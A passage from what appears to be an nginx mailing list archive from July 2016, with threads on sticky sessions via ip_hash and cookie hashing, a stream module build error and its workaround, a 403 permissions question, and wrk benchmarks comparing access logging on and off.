As a module you can try this https://bitbucket.org/nginx-goodies/nginx-sticky-module-ng/overview but, as was mentioned in a previous mail by Robert, the quality might vary, and if you want a better controllable user distribution Lua could also be an option.

p.s. In case of bare nginx the first request is "problematic" since there won't be any cookie yet, so it will always land on one backend, and later, if the cookie gets generated by the backend application, the user might get "moved" to a different backend server. (eg that's why it is better to use a hash key like ip / url or browser agent header which is known to nginx immediately)

rr

From project722 at gmail.com Thu Jul 28 01:23:36 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 20:23:36 -0500 Subject: session persistance with IP hash In-Reply-To: <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> Message-ID:

Reinis Rozitis said: The problem with this (if it matters) is that there is no (pre)defined value of the cookie BACKEND which would specifically route a particular client to a particular backend - I mean, for example, if you use the values 'backend1', 'backend2', 'backend3', the hashed keys might (or might not) as well all point to the same backend server.
================================

I'm not as concerned with what server it's routed to as much as I am concerned with the client session "sticking" to the server it was routed to. And I really do not know enough about how to use cookie-based hashing. In order to have cookie-based hashing, would the cookie need to be common among all pages at the target URL in order to stick the session to a particular server for the duration of that session? (And, I assume cookie-based hashing is not like ip hash in that you are only stuck to a particular server for the duration of that browser session?)

Also, what is the logic behind "round-robin", or is that the same as ip_hash? For instance, if I have a client at 192.168.100.10 that's assigned to backend 3, then 100 more clients come along on the same subnet, they will all land on backend 3. Next, client 192.168.200.10 comes along; what determines whether it lands on backend1 or backend2? Or is there a chance it could also land on backend3?

On Wed, Jul 27, 2016 at 5:01 PM, Reinis Rozitis wrote:

>> Took a look at the link, but I have no idea what that would look like in
>> my upstream stanza. Can you provide an example of what that would look like
>> if I had 3 different backend servers and wanted to ensure that my hash was
>> based on a cookie, or based on just a hash that provided a different
>> backend server per session?
>
> With the vanilla nginx it would be something like (and for example let's
> say your cookie name is BACKEND):
>
> upstream backend {
>     hash $cookie_BACKEND;
>     server backend1:80;
>     server backend2:80;
>     server backend3:80;
> }
>
> The problem with this (if it matters) is that there is no (pre)defined
> value of the cookie BACKEND which would specifically route a particular
> client to a particular backend - I mean for example if you use values
> 'backend1', 'backend2', 'backend3' the hashed keys might (or not) as well
> all point to the same backend server.
> So unless you find 3 values which for sure point to different backends the > load/users might not be evenly distributed (in general it is the same as > with ip_hash if the end-users don't have very distinct IPs or for example > are in the same subnet all the users will land on the same backend (as per > documentation - "The first three octets of the client IPv4 address are used > as a hashing key.")). It shouldn't be too hard though. > > Of course if the values differ (for each user a different cookie) in > longer run the requests will be somewhat evenly distributed. > > As a module you can try this > https://bitbucket.org/nginx-goodies/nginx-sticky-module-ng/overview but > as it was mentioned in previous mail by Robert the quality might vary and > if you want a better controlable user distribution Lua could be also an > option. > > > p.s. In case of the bare nginx the first request is "problematic" since > there won't be any cookie so it will always land on one backend and later > if the cookie gets generated by backend application the user might get > "moved" to a different backend server. (eg that? why it is better to use a > hash key like ip / url or browser agent header which is known to nginx > immediately) > > > rr > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From rpaprocki at fearnothingproductions.net Thu Jul 28 01:44:49 2016 From: rpaprocki at fearnothingproductions.net (Robert Paprocki) Date: Wed, 27 Jul 2016 18:44:49 -0700 Subject: session persistance with IP hash In-Reply-To: References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze> Message-ID: > > > I'm not as concerned with what server its routed to as much as I am > concerned with the client session "sticking" to the server it was routed > to. 
> And I really do not know enough about how to use cookie-based hashing.
> In order to have cookie-based hashing would the cookie need to be common
> among all pages at the target URL in order to stick the session to a
> particular server for the duration of that session?

Assuming you're using a cookie to track the session, the cookie shouldn't change depending on what URI the user is accessing.

> (And, I assume cookie-based hashing is not like ip hash in that you are
> only stuck to a particular server for the duration of that browser session?)

Depends on how long the cookie lives in the browser. If the cookie never changes and doesn't expire when the browser closes, the backend wouldn't change (again, assuming nothing changed about the backend servers). It doesn't matter what is used to build the hash key - cookie, ip, whatever. As long as that value doesn't change, and nothing changes about your backends, the client will hit the same backend every time. Guaranteed.

> Also, what is the logic behind "round-robin" or is that the same as
> ip_hash? For instance, if I have a client at 192.168.100.10 that's assigned
> to backend 3, then 100 more clients come along on the same subnet, they
> will all land on backend 3. Next client 192.168.200.10 comes along, what
> determines whether it lands on backend1 or backend2? Or, is there a chance
> it could also land on backend3?

Round robin means that each backend will be used in turn, regardless of the client. For example, if you have 3 backends:

request 1 -> backend1
request 2 -> backend2
request 3 -> backend3
request 4 -> backend1
request 5 -> backend2

This goes on forever, regardless of the client IP. (Of course, this is relative if you are using server weights - see the example at http://nginx.org/en/docs/http/ngx_http_upstream_module.html#upstream for a round robin example with weights.) If you want session persistence, then round robin balancing is not for you.
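The round-robin rotation described above can be sketched in a few lines of Python (plain rotation only - nginx's actual balancer also handles smooth weighting and failed peers):

```python
from itertools import cycle

# Each backend is used in turn, regardless of which client is asking.
backends = ["backend1", "backend2", "backend3"]
rotation = cycle(backends)

# Five consecutive requests wrap around the backend list.
assignments = [next(rotation) for _ in range(5)]
print(assignments)  # ['backend1', 'backend2', 'backend3', 'backend1', 'backend2']
```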
-------------- next part -------------- An HTML attachment was scrubbed... URL: From dewanggaba at xtremenitro.org Thu Jul 28 07:31:25 2016 From: dewanggaba at xtremenitro.org (Dewangga Bachrul Alam) Date: Thu, 28 Jul 2016 14:31:25 +0700 Subject: ngx_stream module build error on 1.11.3 Message-ID:

Hello!

I've tried to build nginx 1.11.3 with the --with-stream module parameter, but the build fails. My configure invocation and the error are attached below:

.. snip ..
./configure \
--prefix=%{_sysconfdir}/nginx \
--sbin-path=%{_sbindir}/nginx \
--conf-path=%{_sysconfdir}/nginx/nginx.conf \
--error-log-path=%{_localstatedir}/log/nginx/error.log \
--http-log-path=%{_localstatedir}/log/nginx/access.log \
--pid-path=%{_localstatedir}/run/nginx.pid \
--lock-path=%{_localstatedir}/run/nginx.lock \
--http-client-body-temp-path=%{_localstatedir}/cache/nginx/client_temp \
--http-proxy-temp-path=%{_localstatedir}/cache/nginx/proxy_temp \
--http-fastcgi-temp-path=%{_localstatedir}/cache/nginx/fastcgi_temp \
--http-uwsgi-temp-path=%{_localstatedir}/cache/nginx/uwsgi_temp \
--http-scgi-temp-path=%{_localstatedir}/cache/nginx/scgi_temp \
--user=%{nginx_user} \
--group=%{nginx_group} \
--with-http_ssl_module \
--with-http_realip_module \
--with-http_addition_module \
--with-http_sub_module \
--with-http_dav_module \
--with-http_gunzip_module \
--with-http_gzip_static_module \
--with-http_random_index_module \
--with-http_secure_link_module \
--with-http_stub_status_module \
--with-http_auth_request_module \
--with-http_slice_module \
--with-stream \
--with-mail \
--with-mail_ssl_module \
--with-file-aio \
--with-ipv6 \
%{?with_http2:--with-http_v2_module} \
--with-cc-opt="%{optflags} $(pcre-config --cflags)" \
$*
.. snip ..
The error was:

src/stream/ngx_stream_proxy_module.c: In function 'ngx_stream_proxy_handler':
src/stream/ngx_stream_proxy_module.c:542:6: error: 'ngx_stream_upstream_t {aka struct }' has no member named 'ssl_name'
u->ssl_name = uscf->host;
^~
cc -c -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -m64 -mtune=generic -I src/core -I src/event -I src/event/modules -I src/os/unix -I objs -I src/stream \
-o objs/src/stream/ngx_stream_upstream_round_robin.o \
src/stream/ngx_stream_upstream_round_robin.c
objs/Makefile:1498: recipe for target 'objs/src/stream/ngx_stream_proxy_module.o' failed
make[1]: *** [objs/src/stream/ngx_stream_proxy_module.o] Error 1
make[1]: *** Waiting for unfinished jobs....
make[1]: Leaving directory '/home/dominique/rpmbuild/BUILD/nginx-1.11.3'
Makefile:8: recipe for target 'build' failed
make: *** [build] Error 2
error: Bad exit status from /var/tmp/rpm-tmp.IciEtd (%build)

The build was normal without the stream parameter.

From zeal at freecharge.com Thu Jul 28 07:42:48 2016 From: zeal at freecharge.com (Zeal Vora) Date: Thu, 28 Jul 2016 13:12:48 +0530 Subject: basic question about In-Reply-To: References: Message-ID:

Hi Andrea,

The 403 Forbidden error is caused by the permissions on that particular file/directory. The NGINX worker process must be able to read /home/a/all/index.html (and traverse every directory along that path).

Cheers!
Zeal

On Tue, Jul 26, 2016 at 4:47 PM, ndrini wrote:

> I have this server block in a EC2 nginx webserver.
> server {
>     listen 80 default_server;
>     root /home/a/all;
>     index index.html;
>
>     location / {
>         try_files $uri $uri/ =404;
>     }
> }
>
> My idea is that all the sites that point to the server should show the same
> page: index.html, located at /home/a/all/index.html
>
> But I get a
> 403 Forbidden
> nginx/1.4.6 (Ubuntu)
>
> :(
>
> Why?
>
> Thanks,
>
> Andrea
>
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,268466,268466#msg-268466
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

-------------- next part -------------- An HTML attachment was scrubbed... URL: From maxim at nginx.com Thu Jul 28 08:29:52 2016 From: maxim at nginx.com (Maxim Konovalov) Date: Thu, 28 Jul 2016 11:29:52 +0300 Subject: ngx_stream module build error on 1.11.3 In-Reply-To: References: Message-ID:

Hi Dewangga,

On 7/28/16 10:31 AM, Dewangga Bachrul Alam wrote:
> Hello!
>
> I've tried to build nginx 1.11.3 with --with-stream module parameter,
> but, attached below:
[...]

That was already fixed.

As a workaround you can add "--with-stream_ssl_module" to your configure args.

-- Maxim Konovalov

From dewanggaba at xtremenitro.org Thu Jul 28 08:41:43 2016 From: dewanggaba at xtremenitro.org (Dewangga Bachrul Alam) Date: Thu, 28 Jul 2016 15:41:43 +0700 Subject: ngx_stream module build error on 1.11.3 In-Reply-To: References: Message-ID: <8d7939c4-4ce5-7a86-b179-06598805b949@xtremenitro.org>

Thanks Maxim, it works. :)

On 07/28/2016 03:29 PM, Maxim Konovalov wrote:
> Hi Dewangga,
>
> On 7/28/16 10:31 AM, Dewangga Bachrul Alam wrote:
>> Hello!
>>
>> I've tried to build nginx 1.11.3 with --with-stream module parameter,
>> but, attached below:
>
> [...]
>
> That was already fixed.
>
> As a workaround you can add "--with-stream_ssl_module" to your
> configure args.
From nginx-forum at forum.nginx.org Thu Jul 28 14:32:13 2016 From: nginx-forum at forum.nginx.org (stevewin) Date: Thu, 28 Jul 2016 10:32:13 -0400 Subject: Access_log off impact on Requests/sec Message-ID: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org>

I am beginning to look at NGINX performance on a development system with traffic driven by Wrk. Initially I am just looking at static HTTP serving. I am using NGINX v1.10.1 running on the host system with Ubuntu 16.04. Wrk v4.0.4 is running from a separate client platform over a private 40GB connection. The CPU on the host system has 24 cores (no hyperthreading).

I had started to look into various NGINX and kernel parameters for performance optimization. One thing I am seeing that appears odd to me is that when I change access_log to off (from the default of specifying a log location), it seems to decrease the requests/sec that I am seeing when connections increase (using defaults with everything else being equal). Does this make sense?

The results with defaults, including "access_log /var/log/nginx/access.log;", show the Requests/sec ramping up to ~24.5K and staying there. The results with defaults and access_log changed to "access_log off;" show the Requests/sec initially ramping up to ~28.5K but then decreasing down to ~20K and staying there. The NGINX config is at the bottom. Can someone explain possible reasons for this behavior?
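One variable worth ruling out when benchmarking logging overhead: access_log also supports buffered writes, which usually cost far less than unbuffered logging while still keeping the log. A sketch (the buffer/flush values are examples, not tuned recommendations):

```nginx
# Log lines are written to disk only when the 64k buffer fills,
# or when the oldest buffered line is 5 seconds old.
access_log /var/log/nginx/access.log combined buffer=64k flush=5s;
```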
Results: access_log /var/log/nginx/access.log; + wrk -t8 -c8 -d1m http:// Running 1m test @ http:// 8 threads and 8 connections Thread Stats Avg Stdev Max +/- Stdev Latency 0.87ms 3.15ms 75.93ms 97.13% Req/Sec 2.43k 409.97 4.43k 73.88% 1163065 requests in 1.00m, 0.92GB read Requests/sec: 19352.37 Transfer/sec: 15.69MB + wrk -t16 -c16 -d1m http:// Running 1m test @ http:// 16 threads and 16 connections Thread Stats Avg Stdev Max +/- Stdev Latency 1.61ms 5.65ms 102.08ms 96.23% Req/Sec 1.56k 314.27 4.48k 74.08% 1492822 requests in 1.00m, 1.18GB read Requests/sec: 24839.12 Transfer/sec: 20.13MB + wrk -t16 -c24 -d1m http:// Running 1m test @ http:// 16 threads and 24 connections Thread Stats Avg Stdev Max +/- Stdev Latency 1.25ms 4.48ms 102.89ms 97.37% Req/Sec 1.56k 312.01 3.36k 73.64% 1493188 requests in 1.00m, 1.18GB read Requests/sec: 24845.17 Transfer/sec: 20.14MB + wrk -t16 -c32 -d1m http:// Running 1m test @ http:// 16 threads and 32 connections Thread Stats Avg Stdev Max +/- Stdev Latency 3.94ms 12.93ms 216.85ms 95.66% Req/Sec 1.55k 279.44 2.66k 73.49% 1478392 requests in 1.00m, 1.17GB read Requests/sec: 24633.34 Transfer/sec: 19.97MB + wrk -t16 -c48 -d1m http:// Running 1m test @ http:// 16 threads and 48 connections Thread Stats Avg Stdev Max +/- Stdev Latency 8.71ms 24.20ms 295.25ms 93.30% Req/Sec 1.54k 341.58 3.03k 70.92% 1472839 requests in 1.00m, 1.17GB read Requests/sec: 24540.14 Transfer/sec: 19.89MB + wrk -t16 -c72 -d1m http:// Running 1m test @ http:// 16 threads and 72 connections Thread Stats Avg Stdev Max +/- Stdev Latency 17.21ms 40.71ms 527.85ms 89.50% Req/Sec 1.55k 460.73 3.98k 68.62% 1477573 requests in 1.00m, 1.17GB read Requests/sec: 24620.15 Transfer/sec: 19.96MB + wrk -t16 -c96 -d1m http:// Running 1m test @ http:// 16 threads and 96 connections Thread Stats Avg Stdev Max +/- Stdev Latency 36.09ms 66.94ms 728.22ms 85.22% Req/Sec 1.56k 548.79 5.92k 70.25% 1475862 requests in 1.00m, 1.17GB read Requests/sec: 24591.50 Transfer/sec: 19.93MB + wrk 
-t16 -c120 -d1m http:// Running 1m test @ http:// 16 threads and 120 connections Thread Stats Avg Stdev Max +/- Stdev Latency 44.31ms 80.38ms 827.20ms 85.84% Req/Sec 1.56k 624.90 7.01k 71.66% 1474821 requests in 1.00m, 1.17GB read Requests/sec: 24569.45 Transfer/sec: 19.92MB + wrk -t16 -c200 -d1m http:// Running 1m test @ http:// 16 threads and 200 connections Thread Stats Avg Stdev Max +/- Stdev Latency 108.02ms 165.88ms 1.33s 81.91% Req/Sec 1.56k 717.25 9.04k 70.01% 1478936 requests in 1.00m, 1.17GB read Requests/sec: 24642.54 Transfer/sec: 19.97MB + wrk -t16 -c300 -d1m http:// Running 1m test @ http:// 16 threads and 300 connections Thread Stats Avg Stdev Max +/- Stdev Latency 112.68ms 193.21ms 1.87s 83.02% Req/Sec 1.54k 774.83 10.79k 69.02% 1450211 requests in 1.00m, 1.15GB read Socket errors: connect 0, read 0, write 0, timeout 35 Requests/sec: 24161.27 Transfer/sec: 19.58MB + wrk -t16 -c400 -d1m http:// Running 1m test @ http:// 16 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 94.84ms 182.77ms 1.76s 84.51% Req/Sec 1.58k 0.87k 9.04k 69.32% 1477150 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 14, write 0, timeout 44 Requests/sec: 24607.07 Transfer/sec: 19.95MB + wrk -t16 -c500 -d1m http:// Running 1m test @ http:// 16 threads and 500 connections Thread Stats Avg Stdev Max +/- Stdev Latency 82.97ms 176.81ms 1.80s 85.91% Req/Sec 1.57k 842.85 8.80k 68.98% 1483409 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 37, write 0, timeout 111 Requests/sec: 24712.25 Transfer/sec: 20.03MB + wrk -t16 -c1000 -d1m http:// Running 1m test @ http:// 16 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 50.99ms 146.22ms 1.87s 90.23% Req/Sec 1.59k 1.00k 6.05k 67.26% 1476551 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 0, write 0, timeout 189 Requests/sec: 24597.04 Transfer/sec: 19.94MB + wrk -t32 -c32 -d1m http:// Running 1m test @ http:// 32 threads and 32 connections Thread Stats 
Avg Stdev Max +/- Stdev Latency 5.04ms 20.90ms 551.15ms 95.89% Req/Sec 784.23 217.89 2.21k 78.85% 1472562 requests in 1.00m, 1.17GB read Requests/sec: 24529.01 Transfer/sec: 19.88MB + wrk -t32 -c48 -d1m http:// Running 1m test @ http:// 32 threads and 48 connections Thread Stats Avg Stdev Max +/- Stdev Latency 3.37ms 11.92ms 245.37ms 96.30% Req/Sec 774.56 204.08 1.53k 76.20% 1475725 requests in 1.00m, 1.17GB read Requests/sec: 24580.86 Transfer/sec: 19.92MB + wrk -t32 -c72 -d1m http:// Running 1m test @ http:// 32 threads and 72 connections Thread Stats Avg Stdev Max +/- Stdev Latency 16.28ms 37.78ms 410.78ms 89.50% Req/Sec 779.67 313.76 2.02k 67.38% 1481461 requests in 1.00m, 1.17GB read Requests/sec: 24679.28 Transfer/sec: 20.00MB + wrk -t32 -c96 -d1m http:// Running 1m test @ http:// 32 threads and 96 connections Thread Stats Avg Stdev Max +/- Stdev Latency 36.23ms 67.24ms 732.91ms 85.27% Req/Sec 783.82 382.17 3.03k 67.87% 1476051 requests in 1.00m, 1.17GB read Requests/sec: 24589.76 Transfer/sec: 19.93MB + wrk -t32 -c120 -d1m http:// Running 1m test @ http:// 32 threads and 120 connections Thread Stats Avg Stdev Max +/- Stdev Latency 32.16ms 64.51ms 740.32ms 86.21% Req/Sec 784.59 387.94 3.02k 68.36% 1475008 requests in 1.00m, 1.17GB read Requests/sec: 24570.05 Transfer/sec: 19.92MB + wrk -t32 -c200 -d1m http:// Running 1m test @ http:// 32 threads and 200 connections Thread Stats Avg Stdev Max +/- Stdev Latency 108.19ms 165.93ms 1.30s 81.86% Req/Sec 809.75 507.62 6.00k 70.29% 1485154 requests in 1.00m, 1.18GB read Requests/sec: 24739.18 Transfer/sec: 20.05MB + wrk -t32 -c300 -d1m http:// Running 1m test @ http:// 32 threads and 300 connections Thread Stats Avg Stdev Max +/- Stdev Latency 112.47ms 192.19ms 1.80s 82.92% Req/Sec 820.73 534.45 8.41k 70.69% 1481318 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 0, write 0, timeout 22 Requests/sec: 24674.91 Transfer/sec: 20.00MB + wrk -t32 -c400 -d1m http:// Running 1m test @ http:// 32 threads and 400 
connections Thread Stats Avg Stdev Max +/- Stdev Latency 95.58ms 184.69ms 1.78s 84.55% Req/Sec 831.80 563.83 9.21k 70.44% 1483434 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 24, write 0, timeout 60 Requests/sec: 24709.63 Transfer/sec: 20.03MB + wrk -t32 -c500 -d1m http:// Running 1m test @ http:// 32 threads and 500 connections Thread Stats Avg Stdev Max +/- Stdev Latency 82.25ms 174.44ms 1.83s 85.86% Req/Sec 848.41 609.18 11.97k 70.96% 1481738 requests in 1.00m, 1.17GB read Socket errors: connect 0, read 0, write 0, timeout 71 Requests/sec: 24681.93 Transfer/sec: 20.01MB + wrk -t32 -c1000 -d1m http:// Running 1m test @ http:// 32 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 51.30ms 147.85ms 1.90s 90.20% Req/Sec 0.93k 734.15 6.80k 71.46% 1473680 requests in 1.00m, 1.17GB read Socket errors: connect 3, read 23, write 0, timeout 155 Requests/sec: 24543.22 Transfer/sec: 19.89MB Results: access_log off; + wrk -t8 -c8 -d1m http:// Running 1m test @ http:// 8 threads and 8 connections Thread Stats Avg Stdev Max +/- Stdev Latency 774.84us 2.68ms 49.44ms 96.78% Req/Sec 2.80k 469.76 4.41k 74.47% 1339638 requests in 1.00m, 1.06GB read Requests/sec: 22290.17 Transfer/sec: 18.07MB + wrk -t16 -c16 -d1m http:// Running 1m test @ http:// 16 threads and 16 connections Thread Stats Avg Stdev Max +/- Stdev Latency 1.31ms 4.55ms 87.05ms 96.49% Req/Sec 1.79k 367.84 4.05k 71.29% 1707362 requests in 1.00m, 1.35GB read Requests/sec: 28408.74 Transfer/sec: 23.03MB + wrk -t16 -c24 -d1m http:// Running 1m test @ http:// 16 threads and 24 connections Thread Stats Avg Stdev Max +/- Stdev Latency 1.06ms 3.74ms 91.75ms 97.50% Req/Sec 1.79k 368.82 5.17k 70.85% 1711617 requests in 1.00m, 1.35GB read Requests/sec: 28479.84 Transfer/sec: 23.09MB + wrk -t16 -c32 -d1m http:// Running 1m test @ http:// 16 threads and 32 connections Thread Stats Avg Stdev Max +/- Stdev Latency 3.23ms 10.78ms 329.27ms 95.58% Req/Sec 1.59k 374.95 3.19k 67.44% 1522660 
requests in 1.00m, 1.21GB read Requests/sec: 25373.32 Transfer/sec: 20.57MB + wrk -t16 -c48 -d1m http:// Running 1m test @ http:// 16 threads and 48 connections Thread Stats Avg Stdev Max +/- Stdev Latency 5.00ms 16.21ms 455.01ms 96.40% Req/Sec 1.37k 306.37 3.03k 70.59% 1302599 requests in 1.00m, 1.03GB read Requests/sec: 21701.73 Transfer/sec: 17.59MB + wrk -t16 -c72 -d1m http:// Running 1m test @ http:// 16 threads and 72 connections Thread Stats Avg Stdev Max +/- Stdev Latency 5.37ms 14.98ms 533.50ms 96.97% Req/Sec 1.24k 240.24 4.04k 81.22% 1180599 requests in 1.00m, 0.93GB read Requests/sec: 19669.01 Transfer/sec: 15.94MB + wrk -t16 -c96 -d1m http:// Running 1m test @ http:// 16 threads and 96 connections Thread Stats Avg Stdev Max +/- Stdev Latency 9.79ms 24.35ms 643.73ms 96.02% Req/Sec 1.24k 395.64 5.50k 73.35% 1177464 requests in 1.00m, 0.93GB read Requests/sec: 19616.52 Transfer/sec: 15.90MB + wrk -t16 -c120 -d1m http:// Running 1m test @ http:// 16 threads and 120 connections Thread Stats Avg Stdev Max +/- Stdev Latency 12.13ms 30.99ms 665.51ms 95.94% Req/Sec 1.25k 480.20 7.07k 74.10% 1189399 requests in 1.00m, 0.94GB read Requests/sec: 19815.90 Transfer/sec: 16.06MB + wrk -t16 -c200 -d1m http:// Running 1m test @ http:// 16 threads and 200 connections Thread Stats Avg Stdev Max +/- Stdev Latency 22.18ms 39.70ms 919.60ms 91.24% Req/Sec 1.27k 610.20 10.33k 75.28% 1200493 requests in 1.00m, 0.95GB read Requests/sec: 20001.03 Transfer/sec: 16.21MB + wrk -t16 -c300 -d1m http:// Running 1m test @ http:// 16 threads and 300 connections Thread Stats Avg Stdev Max +/- Stdev Latency 36.75ms 56.08ms 657.81ms 87.76% Req/Sec 1.27k 574.61 9.56k 69.81% 1211597 requests in 1.00m, 0.96GB read Requests/sec: 20185.21 Transfer/sec: 16.36MB + wrk -t16 -c400 -d1m http:// Running 1m test @ http:// 16 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 58.44ms 90.62ms 1.05s 87.38% Req/Sec 1.29k 607.24 4.69k 68.92% 1232007 requests in 1.00m, 0.98GB read 
Requests/sec: 20526.47 Transfer/sec: 16.64MB + wrk -t16 -c500 -d1m http:// Running 1m test @ http:// 16 threads and 500 connections Thread Stats Avg Stdev Max +/- Stdev Latency 78.26ms 119.85ms 1.27s 86.15% Req/Sec 1.30k 609.41 4.59k 68.02% 1238043 requests in 1.00m, 0.98GB read Requests/sec: 20626.14 Transfer/sec: 16.72MB + wrk -t16 -c1000 -d1m http:// Running 1m test @ http:// 16 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 164.28ms 251.12ms 2.00s 85.33% Req/Sec 1.33k 634.64 5.14k 70.25% 1268711 requests in 1.00m, 1.00GB read Socket errors: connect 0, read 0, write 0, timeout 473 Requests/sec: 21137.30 Transfer/sec: 17.13MB + wrk -t32 -c32 -d1m http:// Running 1m test @ http:// 32 threads and 32 connections Thread Stats Avg Stdev Max +/- Stdev Latency 3.18ms 10.92ms 311.69ms 95.72% Req/Sec 800.01 260.79 1.62k 65.96% 1526047 requests in 1.00m, 1.21GB read Requests/sec: 25425.33 Transfer/sec: 20.61MB + wrk -t32 -c48 -d1m http:// Running 1m test @ http:// 32 threads and 48 connections Thread Stats Avg Stdev Max +/- Stdev Latency 2.72ms 9.45ms 317.84ms 96.37% Req/Sec 801.31 266.52 1.74k 65.56% 1528825 requests in 1.00m, 1.21GB read Requests/sec: 25471.82 Transfer/sec: 20.65MB + wrk -t32 -c72 -d1m http:// Running 1m test @ http:// 32 threads and 72 connections Thread Stats Avg Stdev Max +/- Stdev Latency 4.87ms 12.19ms 397.58ms 96.75% Req/Sec 616.49 141.23 2.02k 73.03% 1177789 requests in 1.00m, 0.93GB read Requests/sec: 19619.93 Transfer/sec: 15.90MB + wrk -t32 -c96 -d1m http:// Running 1m test @ http:// 32 threads and 96 connections Thread Stats Avg Stdev Max +/- Stdev Latency 9.89ms 21.94ms 542.41ms 94.81% Req/Sec 628.32 283.23 2.99k 71.33% 1199534 requests in 1.00m, 0.95GB read Requests/sec: 19978.86 Transfer/sec: 16.19MB + wrk -t32 -c120 -d1m http:// Running 1m test @ http:// 32 threads and 120 connections Thread Stats Avg Stdev Max +/- Stdev Latency 10.58ms 31.92ms 706.99ms 96.66% Req/Sec 629.12 297.85 3.02k 70.08% 1195385 requests 
in 1.00m, 0.95GB read Requests/sec: 19913.97 Transfer/sec: 16.14MB + wrk -t32 -c200 -d1m http:// Running 1m test @ http:// 32 threads and 200 connections Thread Stats Avg Stdev Max +/- Stdev Latency 22.31ms 43.63ms 1.06s 93.06% Req/Sec 641.57 423.60 5.97k 69.57% 1213269 requests in 1.00m, 0.96GB read Requests/sec: 20210.94 Transfer/sec: 16.38MB + wrk -t32 -c300 -d1m http:// Running 1m test @ http:// 32 threads and 300 connections Thread Stats Avg Stdev Max +/- Stdev Latency 35.67ms 58.67ms 965.84ms 89.02% Req/Sec 648.76 458.09 7.70k 70.86% 1221406 requests in 1.00m, 0.97GB read Requests/sec: 20347.10 Transfer/sec: 16.49MB + wrk -t32 -c400 -d1m http:// Running 1m test @ http:// 32 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 49.30ms 76.09ms 1.32s 87.03% Req/Sec 652.46 467.17 9.95k 68.56% 1227466 requests in 1.00m, 0.97GB read Requests/sec: 20447.03 Transfer/sec: 16.57MB + wrk -t32 -c500 -d1m http:// Running 1m test @ http:// 32 threads and 500 connections Thread Stats Avg Stdev Max +/- Stdev Latency 63.83ms 93.94ms 1.35s 85.94% Req/Sec 651.42 460.18 3.28k 65.49% 1243957 requests in 1.00m, 0.98GB read Requests/sec: 20723.24 Transfer/sec: 16.80MB + wrk -t32 -c1000 -d1m http:// Running 1m test @ http:// 32 threads and 1000 connections Thread Stats Avg Stdev Max +/- Stdev Latency 161.91ms 255.76ms 2.00s 85.74% Req/Sec 659.45 437.48 3.99k 69.13% 1257867 requests in 1.00m, 1.00GB read Socket errors: connect 3, read 0, write 0, timeout 1163 Requests/sec: 20952.53 Transfer/sec: 16.98MB NGINX config: root at ubuntu:/home/ubuntu# nginx -T nginx: the configuration file /etc/nginx/nginx.conf syntax is ok nginx: configuration file /etc/nginx/nginx.conf test is successful # configuration file /etc/nginx/nginx.conf: user www-data; worker_processes auto; pid /run/nginx.pid; events { worker_connections 768; # multi_accept on; } http { ## # Basic Settings ## sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; # 
server_tokens off; # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # SSL Settings ## ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE ssl_prefer_server_ciphers on; ## # Logging Settings ## #access_log /var/log/nginx/access.log; access_log off; error_log /var/log/nginx/error.log; ## # Gzip Settings ## gzip on; gzip_disable "msie6"; # gzip_vary on; # gzip_proxied any; # gzip_comp_level 6; # gzip_buffers 16 8k; # gzip_http_version 1.1; # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript; ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; } #mail { # # See sample authentication script at: # # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript # # # auth_http localhost/auth.php; # # pop3_capabilities "TOP" "USER"; # # imap_capabilities "IMAP4rev1" "UIDPLUS"; # # server { # listen localhost:110; # protocol pop3; # proxy on; # } # # server { # listen localhost:143; # protocol imap; # proxy on; # } #} # configuration file /etc/nginx/mime.types: types { text/html html htm shtml; text/css css; text/xml xml; image/gif gif; image/jpeg jpeg jpg; application/javascript js; application/atom+xml atom; application/rss+xml rss; text/mathml mml; text/plain txt; text/vnd.sun.j2me.app-descriptor jad; text/vnd.wap.wml wml; text/x-component htc; image/png png; image/tiff tif tiff; image/vnd.wap.wbmp wbmp; image/x-icon ico; image/x-jng jng; image/x-ms-bmp bmp; image/svg+xml svg svgz; image/webp webp; application/font-woff woff; application/java-archive jar war ear; application/json json; application/mac-binhex40 hqx; application/msword doc; application/pdf pdf; application/postscript ps eps ai; application/rtf rtf; application/vnd.apple.mpegurl m3u8; application/vnd.ms-excel xls; application/vnd.ms-fontobject eot; application/vnd.ms-powerpoint 
